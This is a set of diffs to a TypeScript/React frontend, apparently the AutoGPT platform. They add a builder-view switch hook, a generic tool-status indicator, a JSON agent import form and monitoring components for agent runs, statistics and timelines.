import { BuilderView } from "./components/BuilderViewTabs/BuilderViewTabs";
export function useBuilderView() {
const isNewFlowEditorEnabled = useGetFlag(Flag.NEW_FLOW_EDITOR);
const isBuilderViewSwitchEnabled = useGetFlag(Flag.BUILDER_VIEW_SWITCH);
const router = useRouter();
const pathname = usePathname();
const searchParams = useSearchParams();
const currentView = searchParams.get("view");
const defaultView = "old";
const selectedView = useMemo<BuilderView>(() => {
if (currentView === "new" || currentView === "old") return currentView;
return defaultView;
}, [currentView, defaultView]);
useEffect(() => {
if (isBuilderViewSwitchEnabled === true) {
if (currentView !== "new" && currentView !== "old") {
const params = new URLSearchParams(searchParams);
params.set("view", defaultView);
router.replace(`${pathname}?${params.toString()}`);
}
}
// eslint-disable-next-line react-hooks/exhaustive-deps
}, [isBuilderViewSwitchEnabled, defaultView, pathname, router, searchParams]);
const setSelectedView = (value: BuilderView) => {
const params = new URLSearchParams(searchParams);
params.set("view", value);
router.push(`${pathname}?${params.toString()}`);
};
return {
isSwitchEnabled: isBuilderViewSwitchEnabled === true,
selectedView,
setSelectedView,
isNewFlowEditorEnabled: Boolean(isNewFlowEditorEnabled),
} as const;
}

View File

@@ -20,6 +20,7 @@ import { FindBlocksTool } from "../../tools/FindBlocks/FindBlocks";
import { RunAgentTool } from "../../tools/RunAgent/RunAgent";
import { RunBlockTool } from "../../tools/RunBlock/RunBlock";
import { SearchDocsTool } from "../../tools/SearchDocs/SearchDocs";
import { GenericTool } from "../../tools/GenericTool/GenericTool";
import { ViewAgentOutputTool } from "../../tools/ViewAgentOutput/ViewAgentOutput";
// ---------------------------------------------------------------------------
@@ -255,6 +256,16 @@ export const ChatMessagesContainer = ({
/>
);
default:
// Render a generic tool indicator for SDK built-in
// tools (Read, Glob, Grep, etc.) or any unrecognized tool
if (part.type.startsWith("tool-")) {
return (
<GenericTool
key={`${message.id}-${i}`}
part={part as ToolUIPart}
/>
);
}
return null;
}
})}

View File

@@ -0,0 +1,63 @@
"use client";
import { ToolUIPart } from "ai";
import { GearIcon } from "@phosphor-icons/react";
import { MorphingTextAnimation } from "../../components/MorphingTextAnimation/MorphingTextAnimation";
interface Props {
part: ToolUIPart;
}
function extractToolName(part: ToolUIPart): string {
// ToolUIPart.type is "tool-{name}", extract the name portion.
return part.type.replace(/^tool-/, "");
}
function formatToolName(name: string): string {
// "search_docs" → "Search docs", "Read" → "Read"
return name.replace(/_/g, " ").replace(/^\w/, (c) => c.toUpperCase());
}
function getAnimationText(part: ToolUIPart): string {
const label = formatToolName(extractToolName(part));
switch (part.state) {
case "input-streaming":
case "input-available":
return `Running ${label}`;
case "output-available":
return `${label} completed`;
case "output-error":
return `${label} failed`;
default:
return `Running ${label}`;
}
}
export function GenericTool({ part }: Props) {
const isStreaming =
part.state === "input-streaming" || part.state === "input-available";
const isError = part.state === "output-error";
return (
<div className="py-2">
<div className="flex items-center gap-2 text-sm text-muted-foreground">
<GearIcon
size={14}
weight="regular"
className={
isError
? "text-red-500"
: isStreaming
? "animate-spin text-neutral-500"
: "text-neutral-400"
}
/>
<MorphingTextAnimation
text={getAnimationText(part)}
className={isError ? "text-red-500" : undefined}
/>
</div>
</div>
);
}
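
For reference, the label shown is derived purely from part.type and part.state via the helpers above; a few illustrative mappings:

// { type: "tool-search_docs", state: "input-available" } → "Running Search docs"
// { type: "tool-Read", state: "output-available" }       → "Read completed"
// { type: "tool-Glob", state: "output-error" }           → "Glob failed"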

View File

@@ -0,0 +1,180 @@
import { GraphExecutionMeta, LibraryAgent } from "@/lib/autogpt-server-api";
import React from "react";
import {
Card,
CardContent,
CardHeader,
CardTitle,
} from "@/components/__legacy__/ui/card";
import { Button } from "@/components/__legacy__/ui/button";
import { TextRenderer } from "@/components/__legacy__/ui/render";
import Link from "next/link";
import {
Dialog,
DialogContent,
DialogHeader,
DialogTrigger,
} from "@/components/__legacy__/ui/dialog";
import {
DropdownMenu,
DropdownMenuContent,
DropdownMenuItem,
DropdownMenuTrigger,
} from "@/components/__legacy__/ui/dropdown-menu";
import { ChevronDownIcon, EnterIcon } from "@radix-ui/react-icons";
import {
Table,
TableBody,
TableCell,
TableHead,
TableHeader,
TableRow,
} from "@/components/__legacy__/ui/table";
import { formatDistanceToNow } from "date-fns";
import { DialogTitle } from "@/components/__legacy__/ui/dialog";
import { AgentImportForm } from "./AgentImportForm";
export const AgentFlowList = ({
flows,
executions,
selectedFlow,
onSelectFlow,
className,
}: {
flows: LibraryAgent[];
executions?: GraphExecutionMeta[];
selectedFlow: LibraryAgent | null;
onSelectFlow: (f: LibraryAgent) => void;
className?: string;
}) => {
return (
<Card className={className}>
<CardHeader className="flex-row items-center justify-between space-x-3 space-y-0">
<CardTitle>Agents</CardTitle>
<div className="flex items-center">
{/* Split "Create" button */}
<Button variant="outline" className="rounded-r-none">
<Link href="/build">Create</Link>
</Button>
<Dialog>
{/* https://ui.shadcn.com/docs/components/dialog#notes */}
<DropdownMenu>
<DropdownMenuTrigger asChild>
<Button
variant="outline"
className={"rounded-l-none border-l-0 px-2"}
data-testid="create-agent-dropdown"
>
<ChevronDownIcon />
</Button>
</DropdownMenuTrigger>
<DropdownMenuContent>
<DialogTrigger asChild>
<DropdownMenuItem data-testid="import-agent-from-file">
<EnterIcon className="mr-2" /> Import from file
</DropdownMenuItem>
</DialogTrigger>
</DropdownMenuContent>
</DropdownMenu>
<DialogContent>
<DialogHeader>
<DialogTitle className="sr-only">Import Agent</DialogTitle>
<h2 className="text-lg font-semibold">
Import an Agent from a file
</h2>
</DialogHeader>
<AgentImportForm />
</DialogContent>
</Dialog>
</div>
</CardHeader>
<CardContent>
<Table>
<TableHeader>
<TableRow>
<TableHead>Name</TableHead>
{/* <TableHead>Status</TableHead> */}
{/* <TableHead>Last updated</TableHead> */}
{executions && (
<TableHead className="md:hidden lg:table-cell">
# of runs
</TableHead>
)}
{executions && <TableHead>Last run</TableHead>}
</TableRow>
</TableHeader>
<TableBody data-testid="agent-flow-list-body">
{flows
.map((flow) => {
let runCount = 0,
lastRun: GraphExecutionMeta | null = null;
if (executions) {
const _flowRuns = executions.filter(
(r) => r.graph_id == flow.graph_id,
);
runCount = _flowRuns.length;
lastRun =
runCount == 0
? null
: _flowRuns.reduce((a, c) => {
const aTime = a.started_at?.getTime() ?? 0;
const cTime = c.started_at?.getTime() ?? 0;
return aTime > cTime ? a : c;
});
}
return { flow, runCount, lastRun };
})
.sort((a, b) => {
if (!a.lastRun && !b.lastRun) return 0;
if (!a.lastRun) return 1;
if (!b.lastRun) return -1;
const bTime = b.lastRun.started_at?.getTime() ?? 0;
const aTime = a.lastRun.started_at?.getTime() ?? 0;
return bTime - aTime;
})
.map(({ flow, runCount, lastRun }) => (
<TableRow
key={flow.id}
data-testid={flow.id}
data-name={flow.name}
className="cursor-pointer"
onClick={() => onSelectFlow(flow)}
data-state={selectedFlow?.id == flow.id ? "selected" : null}
>
<TableCell>
<TextRenderer value={flow.name} truncateLengthLimit={30} />
</TableCell>
{/* <TableCell><FlowStatusBadge status={flow.status ?? "active"} /></TableCell> */}
{/* <TableCell>
{flow.updatedAt ?? "???"}
</TableCell> */}
{executions && (
<TableCell className="md:hidden lg:table-cell">
{runCount}
</TableCell>
)}
{executions &&
(!lastRun ? (
<TableCell />
) : (
<TableCell title={lastRun.started_at?.toString() ?? ""}>
{lastRun.started_at
? formatDistanceToNow(lastRun.started_at, {
addSuffix: true,
})
: "—"}
</TableCell>
))}
</TableRow>
))}
</TableBody>
</Table>
</CardContent>
</Card>
);
};
export default AgentFlowList;

View File

@@ -0,0 +1,175 @@
import { z } from "zod";
import { cn } from "@/lib/utils";
import { useForm } from "react-hook-form";
import { zodResolver } from "@hookform/resolvers/zod";
import React, { useState } from "react";
import {
Form,
FormControl,
FormField,
FormItem,
FormLabel,
FormMessage,
} from "@/components/__legacy__/ui/form";
import { Input } from "@/components/__legacy__/ui/input";
import { Button } from "@/components/__legacy__/ui/button";
import { Textarea } from "@/components/__legacy__/ui/textarea";
import { EnterIcon } from "@radix-ui/react-icons";
import { useBackendAPI } from "@/lib/autogpt-server-api/context";
import {
Graph,
GraphCreatable,
sanitizeImportedGraph,
} from "@/lib/autogpt-server-api";
// Custom Zod schema to validate that the uploaded value is a File instance
const fileSchema = z.custom<File>((val) => val instanceof File, {
message: "Must be a File object",
});
const formSchema = z.object({
agentFile: fileSchema,
agentName: z.string().min(1, "Agent name is required"),
agentDescription: z.string(),
importAsTemplate: z.boolean(),
});
export const AgentImportForm: React.FC<
React.FormHTMLAttributes<HTMLFormElement>
> = ({ className, ...props }) => {
const [agentObject, setAgentObject] = useState<GraphCreatable | null>(null);
const api = useBackendAPI();
const form = useForm<z.infer<typeof formSchema>>({
resolver: zodResolver(formSchema),
defaultValues: {
agentName: "",
agentDescription: "",
importAsTemplate: false,
},
});
function onSubmit(values: z.infer<typeof formSchema>) {
if (!agentObject) {
form.setError("root", { message: "No Agent object to save" });
return;
}
const payload: GraphCreatable = {
...agentObject,
name: values.agentName,
description: values.agentDescription,
is_active: !values.importAsTemplate,
};
api
.createGraph(payload, "upload")
.then((response) => {
const qID = "flowID";
window.location.href = `/build?${qID}=${response.id}`;
})
.catch((error) => {
const entity_type = "agent";
form.setError("root", {
message: `Could not create ${entity_type}: ${error}`,
});
});
}
return (
<Form {...form}>
<form
onSubmit={form.handleSubmit(onSubmit)}
className={cn("space-y-4", className)}
{...props}
>
<FormField
control={form.control}
name="agentFile"
render={({ field }) => (
<FormItem>
<FormLabel>Agent file</FormLabel>
<FormControl className="cursor-pointer">
<Input
type="file"
accept="application/json"
data-testid="import-agent-file-input"
onChange={(e) => {
const file = e.target.files?.[0];
if (file) {
field.onChange(file);
const reader = new FileReader();
// Attach parser to file reader
reader.onload = (event) => {
try {
const obj = JSON.parse(
event.target?.result as string,
);
if (
!["name", "description", "nodes", "links"].every(
(key) => key in obj && obj[key] != null,
)
) {
throw new Error(
"Invalid agent object in file: " +
JSON.stringify(obj, null, 2),
);
}
const graph = obj as Graph;
sanitizeImportedGraph(graph);
setAgentObject(graph);
form.setValue("agentName", graph.name);
form.setValue("agentDescription", graph.description);
} catch (error) {
console.error("Error loading agent file:", error);
form.setError("agentFile", {
message: `Could not load agent from file: ${error}`,
});
}
};
// Load file
reader.readAsText(file);
}
}}
/>
</FormControl>
<FormMessage />
</FormItem>
)}
/>
<FormField
control={form.control}
name="agentName"
disabled={!agentObject}
render={({ field }) => (
<FormItem>
<FormLabel>Agent name</FormLabel>
<FormControl>
<Input {...field} data-testid="agent-name-input" />
</FormControl>
<FormMessage />
</FormItem>
)}
/>
<FormField
control={form.control}
name="agentDescription"
disabled={!agentObject}
render={({ field }) => (
<FormItem>
<FormLabel>Agent description</FormLabel>
<FormControl>
<Textarea {...field} data-testid="agent-description-input" />
</FormControl>
<FormMessage />
</FormItem>
)}
/>
<Button
type="submit"
className="w-full"
disabled={!agentObject}
data-testid="import-agent-submit"
>
<EnterIcon className="mr-2" /> Import & Edit
</Button>
</form>
</Form>
);
};
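
Aside: the file check above only requires four non-null top-level keys; a minimal object that would pass it (values are illustrative — real exports contain full node and link data):

const exampleAgentFile = {
  name: "My Agent",
  description: "Imported example",
  nodes: [], // node definitions from the exported graph
  links: [], // connections between those nodes
};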

View File

@@ -0,0 +1,243 @@
import React, { useEffect, useState } from "react";
import {
Graph,
GraphExecutionMeta,
LibraryAgent,
} from "@/lib/autogpt-server-api";
import {
Card,
CardContent,
CardHeader,
CardTitle,
} from "@/components/__legacy__/ui/card";
import {
DropdownMenu,
DropdownMenuContent,
DropdownMenuLabel,
DropdownMenuRadioGroup,
DropdownMenuRadioItem,
DropdownMenuSeparator,
DropdownMenuTrigger,
} from "@/components/__legacy__/ui/dropdown-menu";
import { Button, buttonVariants } from "@/components/__legacy__/ui/button";
import {
ClockIcon,
ExitIcon,
Pencil2Icon,
PlayIcon,
TrashIcon,
} from "@radix-ui/react-icons";
import Link from "next/link";
import { exportAsJSONFile } from "@/lib/utils";
import {
Dialog,
DialogContent,
DialogHeader,
DialogTitle,
DialogDescription,
DialogFooter,
} from "@/components/__legacy__/ui/dialog";
import useAgentGraph from "@/hooks/useAgentGraph";
import { useBackendAPI } from "@/lib/autogpt-server-api/context";
import { FlowRunsStatus } from "./FlowRunsStatus";
import { RunnerInputDialog } from "../../build/components/legacy-builder/RunnerInputUI";
export const FlowInfo: React.FC<
React.HTMLAttributes<HTMLDivElement> & {
flow: LibraryAgent;
executions: GraphExecutionMeta[];
flowVersion?: number | "all";
refresh: () => void;
}
> = ({ flow, executions, flowVersion, refresh, ...props }) => {
const { savedAgent, saveAndRun, stopRun, isRunning } = useAgentGraph(
flow.graph_id,
flow.graph_version,
undefined,
false,
);
const api = useBackendAPI();
const [flowVersions, setFlowVersions] = useState<Graph[] | null>(null);
const [selectedVersion, setSelectedFlowVersion] = useState(
flowVersion ?? "all",
);
const selectedFlowVersion: Graph | undefined = flowVersions?.find(
(v) =>
v.version ==
(selectedVersion == "all" ? flow.graph_version : selectedVersion),
);
const hasInputs = Object.keys(flow.input_schema.properties).length > 0;
const hasCredentialsInputs =
Object.keys(flow.credentials_input_schema.properties).length > 0;
const [isDeleteModalOpen, setIsDeleteModalOpen] = useState(false);
const [isRunDialogOpen, setIsRunDialogOpen] = useState(false);
const isDisabled = !selectedFlowVersion;
useEffect(() => {
api
.getGraphAllVersions(flow.graph_id)
.then((result) => setFlowVersions(result));
}, [flow.graph_id, api]);
const openRunDialog = () => setIsRunDialogOpen(true);
const runOrOpenInput = () => {
if (hasInputs || hasCredentialsInputs) {
openRunDialog();
} else {
saveAndRun({}, {});
}
};
return (
<Card {...props}>
<CardHeader className="">
<CardTitle>
{flow.name} <span className="font-light">v{flow.graph_version}</span>
</CardTitle>
<div className="flex flex-col space-y-2 py-6">
{(flowVersions?.length ?? 0) > 1 && (
<DropdownMenu>
<DropdownMenuTrigger asChild>
<Button variant="outline">
<ClockIcon className="mr-2" />
{selectedVersion == "all"
? "All versions"
: `Version ${selectedVersion}`}
</Button>
</DropdownMenuTrigger>
<DropdownMenuContent className="w-56">
<DropdownMenuLabel>Choose a version</DropdownMenuLabel>
<DropdownMenuSeparator />
<DropdownMenuRadioGroup
value={String(selectedVersion)}
onValueChange={(choice: string) =>
setSelectedFlowVersion(
choice == "all" ? choice : Number(choice),
)
}
>
<DropdownMenuRadioItem value="all">
All versions
</DropdownMenuRadioItem>
{flowVersions?.map((v) => (
<DropdownMenuRadioItem
key={v.version}
value={v.version.toString()}
>
Version {v.version}
{v.is_active ? " (active)" : ""}
</DropdownMenuRadioItem>
))}
</DropdownMenuRadioGroup>
</DropdownMenuContent>
</DropdownMenu>
)}
{flow.can_access_graph && (
<Link
className={buttonVariants({ variant: "default" })}
href={`/build?flowID=${flow.graph_id}&flowVersion=${flow.graph_version}`}
>
<Pencil2Icon className="mr-2" />
Open in Builder
</Link>
)}
{flow.can_access_graph && (
<Button
variant="outline"
className="px-2.5"
title="Export to a JSON-file"
data-testid="export-button"
onClick={() =>
api
.getGraph(flow.graph_id, selectedFlowVersion!.version, true)
.then((graph) =>
exportAsJSONFile(
graph,
`${flow.name}_v${selectedFlowVersion!.version}.json`,
),
)
}
>
<ExitIcon className="mr-2" /> Export
</Button>
)}
<Button
variant="secondary"
className="bg-purple-500 text-white hover:bg-purple-700"
onClick={!isRunning ? runOrOpenInput : stopRun}
disabled={isDisabled}
title={!isRunning ? "Run Agent" : "Stop Agent"}
>
<PlayIcon className="mr-2" />
{isRunning ? "Stop Agent" : "Run Agent"}
</Button>
{flow.can_access_graph && (
<Button
variant="destructive"
onClick={() => setIsDeleteModalOpen(true)}
data-testid="delete-button"
>
<TrashIcon className="mr-2" />
Delete Agent
</Button>
)}
</div>
</CardHeader>
<CardContent>
<FlowRunsStatus
flows={[flow]}
executions={executions.filter(
(execution) =>
execution.graph_id == flow.graph_id &&
(selectedVersion == "all" ||
execution.graph_version == selectedVersion),
)}
/>
</CardContent>
<Dialog open={isDeleteModalOpen} onOpenChange={setIsDeleteModalOpen}>
<DialogContent>
<DialogHeader>
<DialogTitle>Delete Agent</DialogTitle>
<DialogDescription>
Are you sure you want to delete this agent? <br />
This action cannot be undone.
</DialogDescription>
</DialogHeader>
<DialogFooter>
<Button
variant="outline"
onClick={() => setIsDeleteModalOpen(false)}
>
Cancel
</Button>
<Button
variant="destructive"
onClick={() => {
api.deleteLibraryAgent(flow.id).then(() => {
setIsDeleteModalOpen(false);
refresh();
});
}}
>
Delete
</Button>
</DialogFooter>
</DialogContent>
</Dialog>
{savedAgent && (
<RunnerInputDialog
isOpen={isRunDialogOpen}
doClose={() => setIsRunDialogOpen(false)}
graph={savedAgent}
doRun={saveAndRun}
/>
)}
</Card>
);
};
export default FlowInfo;

View File

@@ -0,0 +1,142 @@
import React, { useCallback, useEffect, useState } from "react";
import { GraphExecutionMeta, LibraryAgent } from "@/lib/autogpt-server-api";
import {
Card,
CardContent,
CardHeader,
CardTitle,
} from "@/components/__legacy__/ui/card";
import Link from "next/link";
import { Button, buttonVariants } from "@/components/__legacy__/ui/button";
import { IconSquare } from "@/components/__legacy__/ui/icons";
import { ExitIcon, Pencil2Icon } from "@radix-ui/react-icons";
import { format } from "date-fns";
import { FlowRunStatusBadge } from "@/app/(platform)/monitoring/components/FlowRunStatusBadge";
import { useBackendAPI } from "@/lib/autogpt-server-api/context";
import RunnerOutputUI, {
OutputNodeInfo,
} from "../../build/components/legacy-builder/RunnerOutputUI";
export const FlowRunInfo: React.FC<
React.HTMLAttributes<HTMLDivElement> & {
agent: LibraryAgent;
execution: GraphExecutionMeta;
}
> = ({ agent, execution, ...props }) => {
const [isOutputOpen, setIsOutputOpen] = useState(false);
const [blockOutputs, setBlockOutputs] = useState<OutputNodeInfo[]>([]);
const api = useBackendAPI();
const fetchBlockResults = useCallback(async () => {
const graph = await api.getGraph(agent.graph_id, agent.graph_version);
const graphExecution = await api.getGraphExecutionInfo(
agent.graph_id,
execution.id,
);
// Transform results to BlockOutput format
setBlockOutputs(
Object.entries(graphExecution.outputs).flatMap(([key, values]) =>
values.map(
(value) =>
({
metadata: {
name: graph.output_schema.properties[key].title || "Output",
description:
graph.output_schema.properties[key].description ||
"Output from the agent",
},
result: value,
}) satisfies OutputNodeInfo,
),
),
);
}, [api, agent.graph_id, agent.graph_version, execution.id]);
// Fetch graph and execution data
useEffect(() => {
if (!isOutputOpen) return;
fetchBlockResults();
}, [isOutputOpen, fetchBlockResults]);
if (execution.graph_id != agent.graph_id) {
throw new Error(
`FlowRunInfo can't be used with non-matching execution.graph_id and agent.graph_id`,
);
}
const handleStopRun = useCallback(() => {
api.stopGraphExecution(agent.graph_id, execution.id);
}, [api, agent.graph_id, execution.id]);
return (
<>
<Card {...props}>
<CardHeader className="flex-row items-center justify-between space-x-3 space-y-0">
<div>
<CardTitle>
{agent.name}{" "}
<span className="font-light">v{execution.graph_version}</span>
</CardTitle>
</div>
<div className="flex space-x-2">
{execution.status === "RUNNING" && (
<Button onClick={handleStopRun} variant="destructive">
<IconSquare className="mr-2" /> Stop Run
</Button>
)}
<Button onClick={() => setIsOutputOpen(true)} variant="outline">
<ExitIcon className="mr-2" /> View Outputs
</Button>
{agent.can_access_graph && (
<Link
className={buttonVariants({ variant: "default" })}
href={`/build?flowID=${execution.graph_id}&flowVersion=${execution.graph_version}&flowExecutionID=${execution.id}`}
>
<Pencil2Icon className="mr-2" /> Open in Builder
</Link>
)}
</div>
</CardHeader>
<CardContent>
<p className="hidden">
<strong>Agent ID:</strong> <code>{agent.graph_id}</code>
</p>
<p className="hidden">
<strong>Run ID:</strong> <code>{execution.id}</code>
</p>
<div>
<strong>Status:</strong>{" "}
<FlowRunStatusBadge status={execution.status} />
</div>
<p>
<strong>Started:</strong>{" "}
{execution.started_at
? format(execution.started_at, "yyyy-MM-dd HH:mm:ss")
: "—"}
</p>
<p>
<strong>Finished:</strong>{" "}
{execution.ended_at
? format(execution.ended_at, "yyyy-MM-dd HH:mm:ss")
: "—"}
</p>
{execution.stats && (
<p>
<strong>Duration (run time):</strong>{" "}
{execution.stats.duration.toFixed(1)} (
{execution.stats.node_exec_time.toFixed(1)}) seconds
</p>
)}
</CardContent>
</Card>
<RunnerOutputUI
isOpen={isOutputOpen}
doClose={() => setIsOutputOpen(false)}
outputs={blockOutputs}
/>
</>
);
};
export default FlowRunInfo;

View File

@@ -0,0 +1,25 @@
import React from "react";
import { Badge } from "@/components/__legacy__/ui/badge";
import { cn } from "@/lib/utils";
import { GraphExecutionMeta } from "@/lib/autogpt-server-api";
export const FlowRunStatusBadge: React.FC<{
status: GraphExecutionMeta["status"];
className?: string;
}> = ({ status, className }) => (
<Badge
variant="default"
className={cn(
status === "RUNNING"
? "bg-blue-500 dark:bg-blue-700"
: status === "QUEUED"
? "bg-yellow-500 dark:bg-yellow-600"
: status === "COMPLETED"
? "bg-green-500 dark:bg-green-600"
: "bg-red-500 dark:bg-red-700",
className,
)}
>
{status}
</Badge>
);

View File

@@ -0,0 +1,92 @@
import React from "react";
import { GraphExecutionMeta, LibraryAgent } from "@/lib/autogpt-server-api";
import {
Card,
CardContent,
CardHeader,
CardTitle,
} from "@/components/__legacy__/ui/card";
import {
Table,
TableBody,
TableCell,
TableHead,
TableHeader,
TableRow,
} from "@/components/__legacy__/ui/table";
import { format } from "date-fns";
import { FlowRunStatusBadge } from "@/app/(platform)/monitoring/components/FlowRunStatusBadge";
import { TextRenderer } from "../../../../components/__legacy__/ui/render";
export const FlowRunsList: React.FC<{
flows: LibraryAgent[];
executions: GraphExecutionMeta[];
className?: string;
selectedRun?: GraphExecutionMeta | null;
onSelectRun: (r: GraphExecutionMeta) => void;
}> = ({ flows, executions, selectedRun, onSelectRun, className }) => (
<Card className={className}>
<CardHeader>
<CardTitle>Runs</CardTitle>
</CardHeader>
<CardContent>
<Table>
<TableHeader>
<TableRow>
<TableHead>Agent</TableHead>
<TableHead>Started</TableHead>
<TableHead>Status</TableHead>
<TableHead>Duration</TableHead>
</TableRow>
</TableHeader>
<TableBody data-testid="flow-runs-list-body">
{executions.map((execution) => (
<TableRow
key={execution.id}
data-testid={`flow-run-${execution.id}-graph-${execution.graph_id}`}
data-runid={execution.id}
data-graphid={execution.graph_id}
className="cursor-pointer"
onClick={() => onSelectRun(execution)}
data-state={selectedRun?.id == execution.id ? "selected" : null}
>
<TableCell>
<TextRenderer
value={
flows.find((f) => f.graph_id == execution.graph_id)?.name
}
truncateLengthLimit={30}
/>
</TableCell>
<TableCell>
{execution.started_at
? format(execution.started_at, "HH:mm")
: "—"}
</TableCell>
<TableCell>
<FlowRunStatusBadge
status={execution.status}
className="w-full justify-center"
/>
</TableCell>
<TableCell>
{execution.stats
? formatDuration(execution.stats.duration)
: ""}
</TableCell>
</TableRow>
))}
</TableBody>
</Table>
</CardContent>
</Card>
);
function formatDuration(seconds: number): string {
return (
(seconds < 100 ? seconds.toPrecision(2) : Math.round(seconds)).toString() +
"s"
);
}
export default FlowRunsList;

View File

@@ -0,0 +1,131 @@
import React, { useState } from "react";
import { GraphExecutionMeta, LibraryAgent } from "@/lib/autogpt-server-api";
import { CardTitle } from "@/components/__legacy__/ui/card";
import { Button } from "@/components/__legacy__/ui/button";
import {
Popover,
PopoverContent,
PopoverTrigger,
} from "@/components/__legacy__/ui/popover";
import { Calendar } from "@/components/__legacy__/ui/calendar";
import { FlowRunsTimeline } from "@/app/(platform)/monitoring/components/FlowRunsTimeline";
export const FlowRunsStatus: React.FC<{
flows: LibraryAgent[];
executions: GraphExecutionMeta[];
title?: string;
className?: string;
}> = ({ flows, executions, title, className }) => {
/* "dateMin": since the first flow in the dataset
* number > 0: custom date (unix timestamp)
* number < 0: offset relative to Date.now() (in seconds) */
const [selected, setSelected] = useState<Date>();
const [statsSince, setStatsSince] = useState<number | "dataMin">(-24 * 3600);
const statsSinceTimestamp = // unix timestamp or null
typeof statsSince == "string"
? null
: statsSince < 0
? Date.now() + statsSince * 1000
: statsSince;
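// e.g. statsSince = -24 * 3600 → Date.now() minus 24h (in ms); statsSince = "dataMin" → no time filter applied here.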
const filteredFlowRuns =
statsSinceTimestamp != null
? executions.filter(
(fr) =>
fr.started_at && fr.started_at.getTime() > statsSinceTimestamp,
)
: executions;
return (
<div className={className}>
<div className="flex flex-row items-center justify-between">
<CardTitle>{title || "Stats"}</CardTitle>
<div className="flex flex-wrap space-x-2">
<Button
variant="outline"
size="sm"
onClick={() => setStatsSince(-2 * 3600)}
>
2h
</Button>
<Button
variant="outline"
size="sm"
onClick={() => setStatsSince(-8 * 3600)}
>
8h
</Button>
<Button
variant="outline"
size="sm"
onClick={() => setStatsSince(-24 * 3600)}
>
24h
</Button>
<Button
variant="outline"
size="sm"
onClick={() => setStatsSince(-7 * 24 * 3600)}
>
7d
</Button>
<Popover>
<PopoverTrigger asChild>
<Button variant={"outline"} size="sm">
Custom
</Button>
</PopoverTrigger>
<PopoverContent className="w-auto p-0" align="start">
<Calendar
mode="single"
selected={selected}
onSelect={(_, selectedDay) => {
setSelected(selectedDay);
setStatsSince(selectedDay.getTime());
}}
/>
</PopoverContent>
</Popover>
<Button
variant="outline"
size="sm"
onClick={() => setStatsSince("dataMin")}
>
All
</Button>
</div>
</div>
<FlowRunsTimeline
flows={flows}
executions={executions}
dataMin={statsSince}
className="mt-3"
/>
<hr className="my-4" />
<div>
<p>
<strong>Total runs:</strong> {filteredFlowRuns.length}
</p>
<p>
<strong>Total run time:</strong>{" "}
{filteredFlowRuns.reduce(
(total, run) => total + (run.stats?.node_exec_time ?? 0),
0,
)}{" "}
seconds
</p>
{filteredFlowRuns.some((r) => r.stats) && (
<p>
<strong>Total cost:</strong> $
{(
filteredFlowRuns.reduce(
(total, run) => total + (run.stats?.cost ?? 0),
0,
) / 100
).toFixed(2)}
</p>
)}
</div>
</div>
);
};
export default FlowRunsStatus;

View File

@@ -0,0 +1,189 @@
import { GraphExecutionMeta, LibraryAgent } from "@/lib/autogpt-server-api";
import {
ComposedChart,
DefaultLegendContentProps,
Legend,
Line,
ResponsiveContainer,
Scatter,
Tooltip,
XAxis,
YAxis,
} from "recharts";
import { differenceInHours, format } from "date-fns";
import { Card } from "@/components/__legacy__/ui/card";
import { cn, hashString } from "@/lib/utils";
import React from "react";
import { FlowRunStatusBadge } from "@/app/(platform)/monitoring/components/FlowRunStatusBadge";
export const FlowRunsTimeline = ({
flows,
executions,
dataMin,
className,
}: {
flows: LibraryAgent[];
executions: GraphExecutionMeta[];
dataMin: "dataMin" | number;
className?: string;
}) => (
/* TODO: make logarithmic? */
<ResponsiveContainer width="100%" height={120} className={className}>
<ComposedChart>
<XAxis
dataKey="time"
type="number"
domain={[
typeof dataMin == "string"
? dataMin
: dataMin < 0
? Date.now() + dataMin * 1000
: dataMin,
Date.now(),
]}
allowDataOverflow={true}
tickFormatter={(unixTime) => {
const now = new Date();
const time = new Date(unixTime);
return differenceInHours(now, time) < 24
? format(time, "HH:mm")
: format(time, "yyyy-MM-dd HH:mm");
}}
name="Time"
scale="time"
/>
<YAxis
dataKey="_duration"
name="Duration (s)"
tickFormatter={(s) => (s > 90 ? `${Math.round(s / 60)}m` : `${s}s`)}
/>
<Tooltip
content={({ payload }) => {
if (payload && payload.length) {
const data: GraphExecutionMeta & {
time: number;
_duration: number;
} = payload[0].payload;
const flow = flows.find((f) => f.graph_id === data.graph_id);
return (
<Card className="p-2 text-xs leading-normal">
<p>
<strong>Agent:</strong> {flow ? flow.name : "Unknown"}
</p>
<div>
<strong>Status:</strong>&nbsp;
<FlowRunStatusBadge
status={data.status}
className="px-1.5 py-0"
/>
</div>
<p>
<strong>Started:</strong>{" "}
{data.started_at
? format(data.started_at, "yyyy-MM-dd HH:mm:ss")
: "—"}
</p>
{data.stats && (
<p>
<strong>Duration / run time:</strong>{" "}
{formatDuration(data.stats.duration)} /{" "}
{formatDuration(data.stats.node_exec_time)}
</p>
)}
</Card>
);
}
return null;
}}
/>
{flows.map((flow) => (
<Scatter
key={flow.id}
data={executions
.filter((e) => e.graph_id == flow.graph_id && e.started_at)
.map((e) => ({
...e,
time:
(e.started_at?.getTime() ?? 0) +
(e.stats?.node_exec_time ?? 0) * 1000,
_duration: e.stats?.node_exec_time ?? 0,
}))}
name={flow.name}
fill={`hsl(${(hashString(flow.id) * 137.5) % 360}, 70%, 50%)`}
/>
))}
{executions
.filter((e) => e.started_at && e.ended_at)
.map((execution) => (
<Line
key={execution.id}
type="linear"
dataKey="_duration"
data={[
{
...execution,
time: execution.started_at!.getTime(),
_duration: 0,
},
{
...execution,
time: execution.ended_at!.getTime(),
_duration: execution.stats?.node_exec_time ?? 0,
},
]}
stroke={`hsl(${(hashString(execution.graph_id) * 137.5) % 360}, 70%, 50%)`}
strokeWidth={2}
dot={false}
legendType="none"
/>
))}
<Legend
content={<ScrollableLegend />}
wrapperStyle={{
bottom: 0,
left: 0,
right: 0,
width: "100%",
display: "flex",
justifyContent: "center",
}}
/>
</ComposedChart>
</ResponsiveContainer>
);
export default FlowRunsTimeline;
const ScrollableLegend: React.FC<
DefaultLegendContentProps & { className?: string }
> = ({ payload, className }) => {
return (
<div
className={cn(
"space-x-3 overflow-x-auto whitespace-nowrap px-4 text-sm",
className,
)}
style={{ scrollbarWidth: "none" }}
>
{payload?.map((entry, index) => {
if (entry.type == "none") return null;
return (
<span key={`item-${index}`} className="inline-flex items-center">
<span
className="mr-1 inline-block size-2.5 rounded-full"
style={{ backgroundColor: entry.color }}
/>
<span>{entry.value}</span>
</span>
);
})}
</div>
);
};
function formatDuration(seconds: number): string {
return (
(seconds < 100 ? seconds.toPrecision(2) : Math.round(seconds)).toString() +
"s"
);
}
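
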